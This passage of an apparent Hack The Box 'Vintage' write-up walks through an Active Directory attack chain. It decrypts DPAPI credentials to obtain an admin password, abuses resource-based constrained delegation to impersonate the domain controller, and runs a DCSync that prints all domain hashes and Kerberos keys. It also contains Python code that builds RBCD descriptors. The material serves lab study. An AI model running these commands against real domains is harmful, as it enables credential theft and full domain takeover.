AgAAAAAAAAAAAAAANABkAGIAZgAwADQAZAA4AC0ANQAyADkAYgAtADQAYgA0AGMALQBiADQAYQBlAC0AOABlADgANwA1AGUANABmAGUAOAA0ADcAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA2or8mZsV0QcGzC0XUJ9K8FBGAAAJgAAAA2YAAJhSpSk/CQYorLpjFuO6lxoHg+a9CGghh0pqkMYfO5Irop3dQGYbS2b3KJo0qLO586XfAvV/0dK/fM8a4erXENVlgtsrHRG48O/VO0Egw0qMZld65hY3jxMWTkzfGqfjNK5ytEtwPHGkAgAAAFiAHjGrO47Qhcn7oxZZBrBQRgAACYAAAANmAABRlZY9IPg0gA9TOU3DaFwm1ylSDyf2HHVE2mTqFzwbK7ZHp2XH8Mx2rvk6EpPUtdIv4kkQU6GsO43Xyg+qcks13CkP8uIIo0ECAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwGUQAxdTpQrS3sEc8gVH9tmXllgaPOCz8cyowsRu8fkbCLFyIcsLVGKHQRv3PUJ1qmSeC604xcQlXI43XddWfFZ3tFF1yLQOSNwfbKDdGQiF3yTlYb6KoMvhQXzs1O1LLP2cUEFOGw8+Pg8uMN4KDBURRWfqmRksyn38bg3OKFSQ1K0CpdNzKfPvS6TnGuvHvnglzZdT5qwQ+nOdXFuJccenatjtlVgQNdp6yZOmpQjrkTtZOxz9b0JRsoOQS0NWu7WThQU4s8yeZkHaJRSJ5lohgdYpZiLJ4x1lG5jLz7/IX5pP6UK1cq5KwLjvaMdGsK9GDj3ofoB/OldTS7StCAXHfzvgjmTscAdxSARKV8ekuDWjsXgz7iZkV04lUG5Jo2FD9xrFdY1DqTSbr7oLdHAwzFBQX5RGnDhKFJXA0KJ29sz1zHGVn4/J4k0e/Hkop6YwRfEighbU=
*Evil-WinRM* PS C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b'))
<--SNIP-->

I’ll do the same with the credential file:

*Evil-WinRM* PS C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\users\c.neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6'))
<--SNIP-->

For each of these three, I’ll paste the base64, decode it, and save it as a file on my host.

└─$ echo "<--SNIP-->" | base64 -d > 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ echo "AgAAAAAAAAAAAAAAOQA5AGMAZgA0ADEAYQAzAC0AYQA1ADUAMgAtADQAYwBmADcALQBhADgAZAA3AC0AYQBjAGEAMgBkADYAZgA3ADMAMwA5AGIAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA6o788ZIMNhaSpbkSX0mC01BGAAAJgAAAA2YAABAM9ZX6Z/40RYL/aC+dw/D5oa7WMYBN56zwgXYX4QrAIb4DtJoM27zWgMxygJ36SpSHHHQGJMgTs6nZN5U/1q7DBIpQlsWk15jpmUFS2czCScuP9C+dGdYT+p6AWb3L7PZUPqNDHqZRAgAAALFxHXdcOeYbfN6CsYeVaYZQRgAACYAAAANmAABiEtEJeAVpg4QA0lnUzAsf6koPtccl1os9yZrj1gTAc/oSmhBNPEE3/VVVPZw9g3NP26Wj3vO36IOmtsXWYABkukmijrSaAZUCAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwr2BFf0a0DhdM8JymBww6mzQt8tVsTbDmCZ/uZu3bzOAOUXODaGaJOOKqRm2W8rHPOZ27YjtD1pd0MFJDocNJwdhN5pwTdz2v2JsrVVVE363zZjXHeXefhuL5AMwMQr6gpTsCGcxrd1ziTN9Q1lH9QtnYE7OZlbrZPhiWO2vvdX+UQcKlgpxcSGLaczL53/UJXrvt9hueRn+YXxnK+fiyZ0gmjMlP+yuxOiKSvHM/UT6NmuYewnApQrOBO3A5F1XKHguHKT+VS187uBu/TO1ZT4/CrsKws1aG7EkIXhRKzEgukAwn5nZlU6YaADdeQRDzCR1D0ycJKFyZd4QE1Nt6Kbgr+ukbiurwBJd/D1a3+WWCw+S2OJVHB9qqlcW11heJd+v9eGe1Wf6/PYCvyyWMsvusF8XUswgKQbkH821vscyNmJWDwMply/ZvellKuGQ1/s5gVqUkALQ=" | base64 -d > 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ echo "AQAAAKIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAo0HPmVKl90yo16yi1vczmwAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAAANmAADAAAAAEAAAANlsnh9uZhRwM1xc/8CNBwwAAAAABIAAAKAAAAAQAAAAK+zRTF7v+bPA1UScG2CL4uAAAABoyaUl8s/1J1TabkeZkP1VvjzlbcQ61ojdLQpks7Q0/irEKMmlFOJ/Za2o8akFz3kS28HEeNGkg/3kGNOvhVbnZ2NJQHTJ12SgjFuAuPhdS9Ob2CvqW9xu7pDGXPt5AHKqlqRy+fajjcEYkGP0ki6sLBF/rpFnQvRQ9hCg8iVqyq3BpSdwOZ1h0Zxh8mbvDPv+XHw9+o6DabZifdfj+GuMRi+GDNLvv8orYUqHZ6hHO3vB4kDu5T4G8QsIAtULBs3V2ww1G7xdGI57BGKi4LEk6kuaEWopsCflsc5FK4a4xBQAAABSjIrXKMIH3qbzDSrnPMUzCyhkAA==" | base64 -d > C4BB96844A5C9DD45D5B6A9859252BA6

Both master key files decrypt with C.Neri's password (the DPAPI user key is derived from it), but only the second one, 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b, decrypts the credential blob; the first gives a padding error:

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi masterkey -file 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne                                                            
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0x55d51b40d9aa74e8cdc44a6d24a25c96451449229739a1c9dd2bb50048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0x55d51b40d9aa74e8cdc44a6d24a25c96451449229739a1c9dd2bb50048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ERROR: Padding is incorrect.
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=admin_acc
Description : 
Unknown     : 
Username    : vintage\c.neri_adm
Unknown     : Uncr4ck4bl3P4ssW0rd0312
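The trial-and-error between the two master key files can be avoided: every DPAPI blob names the master key GUID it was encrypted with in its header, and each master key file names its own GUID. As an added example (not part of the writeup, and not impacket's code), the parser below reads both headers; the credential-file prefix is the first 120 bytes of the C4BB96844A5C9DD45D5B6A9859252BA6 blob shown above, while the two master key files are constructed with the header values impacket printed (zero-filled bodies, since only the header is read).

```python
import base64
import struct
import uuid
from typing import Optional

# First 120 bytes (base64) of the credential file C4BB96844A5C9DD45D5B6A9859252BA6
# pulled from C.Neri's profile above; this covers the CredentialFile and DPAPI blob headers.
CRED_FILE_PREFIX_B64 = (
    "AQAAAKIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAo0HPmVKl90yo16yi1vcz"
    "mwAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwA"
    "IABEAGEAdABhAA0ACgAAAANm"
)

# Master key file header, 128 bytes: Version, two unknown DWORDs, the GUID as 36 UTF-16LE
# characters, one unknown DWORD, the two DWORDs impacket prints as Flags and Policy
# (both 0 on this box), then four 64-bit section lengths.
MK_HEADER_FMT = "<III72sIIIQQQQ"
MK_HEADER_LEN = struct.calcsize(MK_HEADER_FMT)

# CredentialFile header (Version, Size, unknown) followed by the DPAPI blob header:
# Version, provider GUID, master key version, master key GUID, Flags, DescriptionLen.
CRED_HDR_FMT = "<III"
BLOB_HDR_FMT = "<I16sI16sII"


def parse_masterkey_header(data: bytes) -> dict:
    """Read a master key file header and derive the file size the header implies."""
    if len(data) < MK_HEADER_LEN:
        raise ValueError("master key file too short")
    version, _, _, guid, _, flags, policy, mk, bk, ch, dk = struct.unpack_from(MK_HEADER_FMT, data, 0)
    if version != 2:
        raise ValueError(f"unexpected master key file version {version}")
    return {
        "version": version,
        "guid": guid.decode("utf-16-le").lower(),
        "flags": flags,
        "policy": policy,
        "lengths": {"MasterKey": mk, "BackupKey": bk, "CredHist": ch, "DomainKey": dk},
        # header + sections; if this differs from the real file size the transfer was truncated
        "expected_size": MK_HEADER_LEN + mk + bk + ch + dk,
    }


def parse_credential_blob_header(data: bytes) -> dict:
    """Read which master key a Credential Manager file was protected with."""
    _cred_version, blob_size, _unknown = struct.unpack_from(CRED_HDR_FMT, data, 0)
    off = struct.calcsize(CRED_HDR_FMT)
    _blob_version, provider, _mk_version, mk_guid, flags, desc_len = struct.unpack_from(BLOB_HDR_FMT, data, off)
    off += struct.calcsize(BLOB_HDR_FMT)
    description = data[off:off + desc_len].decode("utf-16-le").rstrip("\x00")
    return {
        "blob_size": blob_size,
        "provider_guid": str(uuid.UUID(bytes_le=provider)),  # GUIDs are stored little-endian
        "masterkey_guid": str(uuid.UUID(bytes_le=mk_guid)),
        "flags": flags,
        "description": description,
    }


def pick_masterkey_file(cred_header: dict, masterkey_files: dict) -> Optional[str]:
    """Name of the master key file whose GUID the credential blob references, if present."""
    wanted = cred_header["masterkey_guid"].lower()
    for name, data in masterkey_files.items():
        if parse_masterkey_header(data)["guid"] == wanted:
            return name
    return None


def build_masterkey_file(guid: str, mk: int, bk: int, ch: int, dk: int) -> bytes:
    """Constructed master key file: genuine header layout, zero-filled (undecryptable) sections."""
    header = struct.pack(MK_HEADER_FMT, 2, 0, 0, guid.encode("utf-16-le"), 0, 0, 0, mk, bk, ch, dk)
    return header + b"\x00" * (mk + bk + ch + dk)


if __name__ == "__main__":
    cred = parse_credential_blob_header(base64.b64decode(CRED_FILE_PREFIX_B64))
    # Constructed files carrying the header values impacket printed for C.Neri's two keys
    files = {name: build_masterkey_file(name, 136, 104, 0, 372)
             for name in ("4dbf04d8-529b-4b4c-b4ae-8e875e4fe847", "99cf41a3-a552-4cf7-a8d7-aca2d6f7339b")}
    print("credential blob needs master key", cred["masterkey_guid"], "->", pick_masterkey_file(cred, files))
```

The same header check explains the 740-byte file size above: 128 header bytes plus the 136, 104, 0 and 372 byte sections impacket listed.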

Let's try to authenticate as c.neri_adm:

└─$ netexec smb dc01.vintage.htb -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\c.neri_adm:Uncr4ck4bl3P4ssW0rd0312

RBCD

C.NERI_ADM@VINTAGE.HTB -> MemberOf -> DELEGATEDADMINS@VINTAGE.HTB -> AllowedToAct -> DC01.VINTAGE.HTB

To pull off this attack, I'll need a compromised account with a service principal name (SPN): in the standard S4U flow, the S4U2self ticket obtained for an account without an SPN is not forwardable, so the following S4U2proxy request is refused. C.Neri_adm does not have an SPN, and I don't have permissions to add one. But FS01$ does (computer accounts get SPNs when they join the domain), and C.Neri_adm has GenericWrite over DelegatedAdmins, which means they can add accounts to the group. The KDC's RBCD check is an access check against DC01's msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor using the requesting service's SIDs, group SIDs from its PAC included, so a group listed in that descriptor is enough: once FS01$ is a member of DelegatedAdmins, I can have the FS01$ account request a ticket on behalf of any account. There are many ways to exploit this. I'll get a CIFS ticket as the DC01$ computer account and use that to dump the hashes for the domain.
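
As an added illustration (my own code, not from the box, the writeup's tooling or the impacket project), the Python below builds and parses the msDS-AllowedToActOnBehalfOfOtherIdentity value that makes DC01 trust DelegatedAdmins, and approximates the KDC's check so you can see why group membership alone gets FS01$ through. The two SIDs are made-up placeholders, not the real SIDs from the box; the byte layout follows the self-relative SECURITY_DESCRIPTOR, ACL and ACCESS_ALLOWED_ACE structures from MS-DTYP.

```python
import struct

# Constructed sample SIDs for illustration; they are NOT the real SIDs from the box.
DELEGATED_ADMINS_SID = "S-1-5-21-1111111111-2222222222-3333333333-1150"
FS01_SID = "S-1-5-21-1111111111-2222222222-3333333333-1108"

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL = 0x000F01FF  # access mask impacket's rbcd.py writes (983551)


def sid_to_bytes(sid: str) -> bytes:
    """Encode "S-1-5-21-..." as a binary SID: revision, sub-authority count,
    48-bit big-endian identifier authority, little-endian sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    authority = int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", 1, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(data: bytes) -> str:
    """Decode a binary SID back to its string form."""
    rev, count = struct.unpack_from("<BB", data, 0)
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))


def build_rbcd_sd(allowed_sids: list[str]) -> bytes:
    """Build the self-relative SECURITY_DESCRIPTOR that RBCD tooling writes into
    msDS-AllowedToActOnBehalfOfOtherIdentity: no owner, group or SACL, just a
    DACL with one ACCESS_ALLOWED_ACE per principal allowed to act."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        ace_size = 8 + len(sid_b)  # AceType(1) + AceFlags(1) + AceSize(2) + Mask(4) + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, FULL_CONTROL) + sid_b
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    # SD header: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    control = SE_DACL_PRESENT | SE_SELF_RELATIVE
    return struct.pack("<BBHIIII", 1, 0, control, 0, 0, 0, 20) + acl


def allowed_to_act(sd: bytes) -> list[str]:
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL.
    Feed it the raw attribute value read from DC01 over LDAP to confirm which
    principals (here a group) may delegate to it."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos = off_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(sd[pos + 8:pos + ace_size]))
        pos += ace_size
    return sids


def can_act(sd: bytes, principal_sid: str, member_of: list[str]) -> bool:
    """Approximate the KDC's S4U2proxy check: the requesting service passes if
    its own SID or any group SID carried in its TGT's PAC is granted."""
    granted = set(allowed_to_act(sd))
    return principal_sid in granted or any(g in granted for g in member_of)


if __name__ == "__main__":
    sd = build_rbcd_sd([DELEGATED_ADMINS_SID])
    print("allowed to act on DC01:", allowed_to_act(sd))
    print("FS01$ alone:", can_act(sd, FS01_SID, []))
    print("FS01$ in DelegatedAdmins:", can_act(sd, FS01_SID, [DELEGATED_ADMINS_SID]))
```

The practical use is the verification step: fetch msDS-AllowedToActOnBehalfOfOtherIdentity from DC01$ as raw bytes over LDAP and pass them to allowed_to_act; if the DelegatedAdmins SID is listed, adding a member with an SPN is all that is needed, and no write to the attribute itself (which would show up in audit logs on the DC object) is required.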

Add FS01$ to DelegatedAdmins

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-getTGT vintage.htb/'C.Neri_adm':'Uncr4ck4bl3P4ssW0rd0312' -dc-ip 10.10.11.45
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in C.Neri_adm.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=C.Neri_adm.ccache 

└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb  -k add groupMember DelegatedAdmins 'fs01$' 
[+] fs01$ added to DelegatedAdmins

Get DC01$ ST

I'll make a new ticket as FS01$ (in a new terminal, so the C.Neri_adm ccache exported above is not picked up). Note that impacket ignores /tmp/krb5cc_1000 unless KRB5CCNAME points at it, which is why getST below reports "CCache file is not found" and authenticates with the FS01$ password given on the command line instead; the kinit just confirms the credentials are valid:

└─$ kinit 'fs01$@VINTAGE.HTB'
Password for fs01$@VINTAGE.HTB: 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ klist                    
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: fs01$@VINTAGE.HTB

Valid starting     Expires            Service principal
07/26/25 00:45:31  07/26/25 10:45:31  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 07/27/25 00:45:28
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate 'dc01$' 'vintage.htb/fs01$:fs01' -dc-ip dc01.vintage.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache

Now we can DCSync. secretsdump with -k -no-pass takes the ticket from KRB5CCNAME, so that has to point at the dc01$@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache file getST just saved (exported the same way as for C.Neri_adm above). The warning about SPN target name validation can be ignored here; the full DRSUAPI dump still comes through:

└─$ impacket-secretsdump vintage.htb/'dc01$'@dc01.vintage.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:6b751449807e0d73065b0423b64687f0:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:5008d30496b4c5069ce1fc187b5b5960:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:5f22c4cf44bc5277d90b8e281b9ba3735636bd95a72f3870ae3de93513ce63c5
Administrator:aes128-cts-hmac-sha1-96:c119630313138df8cd2e98b5e2d018f7
Administrator:des-cbc-md5:c4d5072368c27fba
krbtgt:aes256-cts-hmac-sha1-96:8d969dafdd00d594adfc782f13ababebbada96751ec4096bce85e122912ce1f0
krbtgt:aes128-cts-hmac-sha1-96:3c7375304a46526c00b9a7c341699bc0
krbtgt:des-cbc-md5:e923e308752658df
M.Rossi:aes256-cts-hmac-sha1-96:14d4ea3f6cd908d23889e816cd8afa85aa6f398091aa1ab0d5cd1710e48637e6
M.Rossi:aes128-cts-hmac-sha1-96:3f974cd6254cb7808040db9e57f7e8b4
M.Rossi:des-cbc-md5:7f2c7c982cd64361
R.Verdi:aes256-cts-hmac-sha1-96:c3e84a0d7b3234160e092f168ae2a19366465d0a4eab1e38065e79b99582ea31
R.Verdi:aes128-cts-hmac-sha1-96:d146fa335a9a7d2199f0dd969c0603fb
R.Verdi:des-cbc-md5:34464a58618f8938
L.Bianchi:aes256-cts-hmac-sha1-96:abcbbd86203a64f177288ed73737db05718cead35edebd26740147bd73e9cfed
L.Bianchi:aes128-cts-hmac-sha1-96:92067d46b54cdb11b4e9a7e650beb122
L.Bianchi:des-cbc-md5:01f2d667a19bce25
G.Viola:aes256-cts-hmac-sha1-96:f3b3398a6cae16ec640018a13a1e70fc38929cfe4f930e03b1c6f1081901844a
G.Viola:aes128-cts-hmac-sha1-96:367a8af99390ebd9f05067ea4da6a73b
G.Viola:des-cbc-md5:7f19b9cde5dce367
C.Neri:aes256-cts-hmac-sha1-96:c8b4d30ca7a9541bdbeeba0079f3a9383b127c8abf938de10d33d3d7c3b0fd06
C.Neri:aes128-cts-hmac-sha1-96:0f922f4956476de10f59561106aba118
C.Neri:des-cbc-md5:9da708a462b9732f
P.Rosa:aes256-cts-hmac-sha1-96:f9c16db419c9d4cb6ec6242484a522f55fc891d2ff943fc70c156a1fab1ebdb1
P.Rosa:aes128-cts-hmac-sha1-96:1cdedaa6c2d42fe2771f8f3f1a1e250a
P.Rosa:des-cbc-md5:a423fe64579dae73
svc_sql:aes256-cts-hmac-sha1-96:3bc255d2549199bbed7d8e670f63ee395cf3429b8080e8067eeea0b6fc9941ae
svc_sql:aes128-cts-hmac-sha1-96:bf4c77d9591294b218b8280c7235c684
svc_sql:des-cbc-md5:2ff4022a68a7834a
svc_ldap:aes256-cts-hmac-sha1-96:d5cb431d39efdda93b6dbcf9ce2dfeffb27bd15d60ebf0d21cd55daac4a374f2
svc_ldap:aes128-cts-hmac-sha1-96:cfc747dd455186dba6a67a2a340236ad
svc_ldap:des-cbc-md5:e3c48675a4671c04
svc_ark:aes256-cts-hmac-sha1-96:820c3471b64d94598ca48223f4a2ebc2491c0842a84fe964a07e4ee29f63d181
svc_ark:aes128-cts-hmac-sha1-96:55aec332255b6da8c1344357457ee717
svc_ark:des-cbc-md5:6e2c9b15bcec6e25
C.Neri_adm:aes256-cts-hmac-sha1-96:96072929a1b054f5616e3e0d0edb6abf426b4a471cce18809b65559598d722ff
C.Neri_adm:aes128-cts-hmac-sha1-96:ed3b9d69e24d84af130bdc133e517af0
C.Neri_adm:des-cbc-md5:5d6e9dd675042fa7
L.Bianchi_adm:aes256-cts-hmac-sha1-96:529fa80540d759052c6beb161d5982435a37811b3ad2a338e81b75797c11959e
L.Bianchi_adm:aes128-cts-hmac-sha1-96:7e4599a7f84c2868e20141bdc8608bd7
L.Bianchi_adm:des-cbc-md5:8fa746971a98fedf
DC01$:aes256-cts-hmac-sha1-96:f8ceb2e0ea58bf929e6473df75802ec8efcca13135edb999fcad20430dc06d4b
DC01$:aes128-cts-hmac-sha1-96:a8f037cb02f93e9b779a84441be1606a
DC01$:des-cbc-md5:c4f15ef8c4f43134
gMSA01$:aes256-cts-hmac-sha1-96:39847e723bd576449a295d008d66ae0bbf09610a1f14fedef69a93f2c0ba0024
gMSA01$:aes128-cts-hmac-sha1-96:49bcbd0a324fe0ec583ec07a29b2d3c1
gMSA01$:des-cbc-md5:2aef79763b76eff8
FS01$:aes256-cts-hmac-sha1-96:d57d94936002c8725eab5488773cf2bae32328e1ba7ffcfa15b81d4efab4bb02
FS01$:aes128-cts-hmac-sha1-96:ddf2a2dcc7a6080ea3aafbdf277f4958
FS01$:des-cbc-md5:dafb3738389e205b
[*] Cleaning up... 

Now we can authenticate as Administrator with the dumped NT hash (pass-the-hash into a Kerberos TGT, since NTLM is disabled):

└─$ impacket-getTGT vintage.htb/administrator@dc01.vintage.htb -hashes :468c7497513f8243b59980f2240a10de             
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator@dc01.vintage.htb.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=administrator@dc01.vintage.htb.ccache          
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb          
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Invalid token was supplied
Success                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                              
                                 

It fails. That's because the Administrator account is restricted from logging in: the hash is correct, but the logon type is denied by policy (a user-rights assignment such as "Deny access to this computer from the network"). I can see this with netexec, which reports STATUS_LOGON_TYPE_NOT_GRANTED rather than a bad-credential error:

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ netexec smb dc01.vintage.htb -u Administrator -H 468c7497513f8243b59980f2240a10de -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\Administrator:468c7497513f8243b59980f2240a10de STATUS_LOGON_TYPE_NOT_GRANTED 

The Domain Admins group has two users in it. Since Administrator is blocked, I'll try the same thing with the other one, L.Bianchi_adm, whose hash is in the dump above:

└─$ impacket-getTGT  vintage.htb/L.Bianchi_adm@dc01.vintage.htb -hashes :6b751449807e0d73065b0423b64687f0
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

